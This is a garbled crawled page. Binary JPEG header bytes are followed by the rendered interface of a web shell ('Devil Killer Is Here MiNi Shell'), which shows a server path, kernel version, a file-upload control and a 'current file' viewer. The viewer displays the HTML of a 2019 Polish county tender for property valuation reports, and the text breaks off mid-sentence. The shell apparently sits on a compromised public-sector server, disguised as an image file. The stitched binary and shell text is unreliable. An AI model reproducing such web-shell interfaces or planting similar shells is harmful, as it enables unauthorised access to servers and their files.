JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20191028/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20191028/615453-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 615453-N-2019 z dnia 2019-10-28 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Powiat Białostocki - Starostwo Powiatowe w Białymstoku</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">wykonanie operatów szacunkowych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Powiat Białostocki - Starostwo Powiatowe w Białymstoku</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">05065839600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Borsucza</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">2</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">15-569</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Białystok</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podlaskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">85 740 39 51, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@st.bialystok.wrotapodlasia.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">85 740 39 82</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://bip.st.bialystok.wrotapodlasia.pl </span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia">nie dotyczy </span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.st.bialystok.wrotapodlasia.pl </span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.st.bialystok.wrotapodlasia.pl </span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">wymagane jest przesłanie ofert w formie pisemnej - za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 roku - Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015r. poz. 1830) osobiście lub za pośrednictwem posłańca. Nie dopuszcza się składania ofert w postaci elektronicznej. </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Starostwo Powiatowe w Białymstoku, ul. Borsucza 2, 15-569 Białystok </span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">wykonanie operatów szacunkowych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">OR.272.21.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest wykonanie operatów szacunkowych określających wartość rynkową nieruchomości w podziale na następujące części:Część AWykonanie operatów szacunkowych określających wartość nieruchomości (wartość rynkową), niezbędnych w prowadzonych postępowaniach administracyjnych, dotyczących:nieruchomości gruntowych wydzielonych pod drogi publiczne w trybie przepisów art. 98 ustawy z dnia 21 sierpnia 1997 roku o gospodarce nieruchomościami na podstawie:1.	Decyzja Burmistrza Supraśla z dnia 15 grudnia 2015 roku RGGN.6831.49.2015 obręb Grabówka gm. Supraśl działka o nr 297/4 o pow. 0.0992 ha, działa nr 297/11 o pow. 0.1029 ha, działka nr 297/14 o pow. 1529 ha; Księga wieczysta nr BI1B/00029964/2, sygn. akt GKN.683.122.2019;Część BWykonanie operatów szacunkowych określających wartość nieruchomości (wartość rynkową), położonych na terenie powiatu białostockiego, niezbędnych w prowadzonych postępowaniach administracyjnych, dotyczących:nieruchomości, wymienionych poniżej, które przejęte zostały pod drogi w trybie przepisów ustawy z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych - w celu ustalenia za nie wysokości odszkodowania; przy wycenie wartości nieruchomości należy uwzględnić między innymi przepisy wynikające z rozporządzenia Rady Ministrów z dnia 4 września 2004 roku w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. Nr 207, poz. 2109 z późn. zm):1. Obręb Chodory gm. Turośń Kościelna – 2 działki, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.03.7.2011 z 11 lipca 2013 r. (droga powiatowa), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.	działka nr 99/1 o pow. 0,0028 ha, BIIB/00099267/7, sygn. 109.2014;2.	działka nr 76 o pow. 0,0039 ha, brak informacji o KW, sygn. 112.2014;2.Obręb Łapy II gm. Łapy – 1 działka, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.12.2016 z 24 października 2016 r. (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.działka nr 697/1 o pow.0,0008 ha, brak informacji o KW, sygn. 53.2017 3.Obręb Czaplino gm. Choroszcz – 1 działka, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.18.2016 z 6 września 2016 r. (droga powiatowa), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.działka nr 53/25 o pow.0,0020 ha, brak informacji o KW, sygn. 345.2016;4.Obręb Ignatki gm. Juchnowiec Kościelny – 3 działki, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.28.2018 z 8 marca 2018 r. i decyzja Wojewody Podlaskiego z 30 sierpnia 2019r. AB-II.7821.6.2019.ED utrzymująca w mocy (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.działka nr 191/39 o pow.0,0012 ha, BI1B/00107605/9, sygn. 124.2019 2.działka nr 191/41 o pow.0,0050 ha, BI1B/00196684/6, sygn.125.2019;3.działka nr 192/1 o pow.0,0050 ha, BI1B/00218261/6, sygn.126.2019.Łącznie 7 działekCzęść CWykonanie operatów szacunkowych określających wartość nieruchomości (wartość rynkową), położonych na terenie powiatu białostockiego, niezbędnych w prowadzonych postępowaniach administracyjnych, dotyczących:nieruchomości, wymienionych poniżej, które przejęte zostały pod drogi w trybie przepisów ustawy z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych - w celu ustalenia za nie wysokości odszkodowania; przy wycenie wartości nieruchomości należy uwzględnić między innymi przepisy wynikające z rozporządzenia Rady Ministrów z dnia 4 września 2004 roku w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. Nr 207, poz. 2109 z późn. zm):1.Obręb Zabłudów gm. Zabłudów – 36 działek, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.6.2019 z 13 sierpnia 2019 r. (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.	działka nr 1/18 o powierzchni 0,1328ha, ark.3, brak informacji o KW, sygn.akt.163.2019;2.	działka nr 8/33 o powierzchni 0,0044ha - ark.3, BI1B/00241865/0, 8/31 o powierzchni 0,0105 ha ark.3, BI1B/00239270/5, sygn.akt.164.2019;3.	działka nr 3/3 o powierzchni 0,0292ha, działka nr 3/5 o powierzchni 0,0571ha – ark.18, BI1B/00052127/3, sygn.akt.165.2019;4.	działka nr 4/35 o powierzchni 0,0022ha, działka nr 4/37 o powierzchni 0,0128ha - ark. 9, BI1B/00048027/1 sygn.akt.166.2019; 5.	działka nr 4/39 o powierzchni 0,0021ha, działka nr 4/41 o powierzchni 0,0111ha - ark. 19,BI1B/0048025/7 sygn.akt.167.2019;6.	działka nr 9/3 o powierzchni 0,0127ha - ark.20, BI1B/00259178/6, sygn.akt.168.2019;7.	działka nr 9/5 o powierzchni 0,0154ha, działka nr 11/11 o powierzchni 0,0473ha – ark.20, działka nr 5/12 o powierzchni 0,0511ha –ark.3, BI1B/00099449/7, sygn.akt.169.2019;8.	działka nr 10/20 o powierzchni 0,0609ha-ark.20, BI1B/00090490/6, sygn.akt.170.2019; 9.	działka nr 12/8 o powierzchni 0,0096ha-ark.21, BI1B/00235426/6, działka nr 7/29 o powierzchni 0,0291ha,działka nr 8/35 o powierzchni 0,0470ha – ark.19, działka nr 13/2 o powierzchni 0,0079ha, działka nr 14/5 o powierzchni 0,0077ha - ark.21, brak informacji o KW, sygn.akt.171.2019;10.	działka nr 15/12 o powierzchni 0,0197ha-ark.21, brak informacji o KW, sygn.akt.172.2019;11.	działka nr 6/24 o powierzchni 0,0123ha, działka nr 6/25 o powierzchni 0,0119ha – ark.3, BI1B/00224609/3 sygn.akt.173.2019;12.	działka nr 8/37 o powierzchni 0,0226ha – ark. 3, BI1B/00207075/5, sygn.akt.174.2019;13.	działka nr 4/43 o powierzchni 0,0010ha, działka nr 4/45 o powierzchni 0,0106ha–ark.19, BI1B/00048026/4 sygn.akt.175.2019;14.	działka nr 5/14 o powierzchni 0,0040ha - ark.19, BI1B/00057917/3, działka nr 5/16 o powierzchni 0,0076ha-ark.19, BI1B/00050791/4, sygn.akt.176.2019;15.	działka nr 5/20 o powierzchni 0,0094ha - ark.19, brak informacji o KW, sygn.akt.177.2019; 16.	działka nr 6/31 o powierzchni 0,0126ha - ark.19, BI1B/00208336/0, sygn.akt.178.2019;17.	działka nr 6/33 o powierzchni 0,0167ha - ark.19, BIIB/00208337/7, sygn.akt.179.2019;18.	działka nr 6/22 o powierzchni 0,0199ha, działka nr 6/27 o powierzchni 0,0148ha, działka nr 6/29 o powierzchni 0,0180ha - ark.3, BI1B/00085200/9, sygn.akt.180.2019;19.	działka nr 1/16 o powierzchni 0,0082ha - ark.18, BI1B/00045224/1, sygn.akt.181.2019;20.	działka nr 5/18 o powierzchni 0,0077ha - ark.19, BI1B/00176251/6, sygn.akt.182.2019; 21.	działka nr 4/47 o powierzchni 0,0203ha - ark.19, BI1B/00138475/4, sygn.akt.185.2019. Część DWykonanie operatów szacunkowych określających wartość nieruchomości (wartość rynkową), położonych na terenie powiatu białostockiego, niezbędnych w prowadzonych postępowaniach administracyjnych, dotyczących:nieruchomości, wymienionych poniżej, które przejęte zostały pod drogi w trybie przepisów ustawy z dnia 10 kwietnia 2003 roku o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych - w celu ustalenia za nie wysokości odszkodowania; przy wycenie wartości nieruchomości należy uwzględnić między innymi przepisy wynikające z rozporządzenia Rady Ministrów z dnia 4 września 2004 roku w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. Nr 207, poz. 2109 z późn. zm):1.Obręb Pasynki gm. Zabłudów – 4 działki, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.6.2019 z 13 sierpnia 2019 r. (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.	działka nr 514/1 o powierzchni 0,0029ha, BI1B/00121002/6, sygn.akt.141.2019; 2.	działka nr 588/3 o powierzchni 0,0022ha, BI1B/00070516/9, sygn.akt.142.2019; 3.	działka nr 532/1 o powierzchni 0,0521ha, BI1B/00025381/3, sygn.akt.143.2019; 4.	działka nr 565/1 o powierzchni 0,1135ha, BI1B/00124858/2, sygn.akt.144.2019; 2.Obręb Zagruszany gm. Zabłudów – 13 działek, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.6.2019 z 13 sierpnia 2019 r. (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.	działka nr 2/1 o powierzchni 0,0527ha, BI1B/00051673/8, sygn.akt.145.2019; 2.	działka nr 3/1 o powierzchni 0,0285ha, działka nr 9/1 o powierzchni 0,0316ha, działka nr 1/1 o powierzchni 0,1329ha, działka nr 5/1 o powierzchni 0,1705ha, BI1B/00164057/2, sygn.akt.146.2019; 3.	działka nr 4/1 o powierzchni 0,0082ha, BI1B/00034186/2, sygn.akt.147.2019;4.	działka nr 6/1 o powierzchni 0,0156ha, BI1B/00019679/4, sygn.akt.148.2019; 5.	działka nr 8/1 o powierzchni 0,0151ha, BI1B/00048685/1, sygn.akt.149.2019;6.	działka nr 10/1 o powierzchni 0,0165ha, BI1B/00057735/3, sygn.akt.150.2019; 7.	działka nr 11/1 o powierzchni 0,0184ha, BI1B/00023871/1 , sygn.akt.151.2019;8.	działka nr 12/1 o powierzchni 0,0197ha, działka nr 29/1 o powierzchni 0,0013ha, BI1B/00044885/5, sygn.akt.152.2019; 9.	działka nr 7/1 o powierzchni 0,1403ha, BI1B/00074206/1, sygn.akt.153.2019. 3.Obręb Kucharówka gm. Zabłudów – 6 działek, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.6.2019 z 13 sierpnia 2019 r. (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.	działka nr 102/1 o powierzchni 0,0421ha, BI1B/00210325/7, sygn.akt.154.2019; 2.	działka nr 104/3 o powierzchni 0,0451ha, BI1B/00048240/0, sygn.akt.155.2019; 3.	działka nr 104/5 o powierzchni 0,0206ha, BI1B/00020693/8, sygn.akt.156.2019; 4.	działka nr 106/1 o powierzchni 0,0214ha, BI1B/00253852/3, sygn.akt.157.2019;5.	działka nr 108/1 o powierzchni 0,0301ha, BI1B/00128228/5, sygn.akt.158.2019; 6.	działka nr 110 o powierzchni 0,02ha, BI1B/00024517/9, sygn.akt.183.2019. 4.Obręb Kowalowce gm. Zabłudów – 8 działek, decyzja o zezwoleniu na realizację inwestycji drogowej AR.6740.3.6.2019 z 13 sierpnia 2019 r. (droga gminna), wycena prawa własności i ograniczonych praw rzeczowych, o ile istnieją:1.	działka nr 18/17 o powierzchni 0,0774ha, działka nr 18/19 o powierzchni 0,0892ha, BI1B/00020693/8, sygn.akt.156.2019; 2.	działka nr 6/1 o powierzchni 0,0276ha, działka nr 2/1 o powierzchni 0,0173ha, działka nr 2/2 o powierzchni 0,0162ha, BI1B/00118556/0, sygn.akt.159.2019;3.	działka nr 5/1 o powierzchni 0,0152ha, BI1B/00256612/0, sygn.akt.160.2019;4.	działka nr 22/1 o powierzchni 0,0253ha, brak informacji o KW, sygn.akt.161.2019;5.	działka nr 1/3 o powierzchni 0,1316ha, BI1B/00029963/5, sygn.akt.162.2019. Łącznie 31 działekCzęść EWykonanie operatów szacunkowych określających wartość nieruchomości (wartość rynkową), niezbędnych w prowadzonych postępowaniach, dotyczących:nieruchomości stanowiących własność Skarbu Państwa, przeznaczonych do przekształcenia prawa 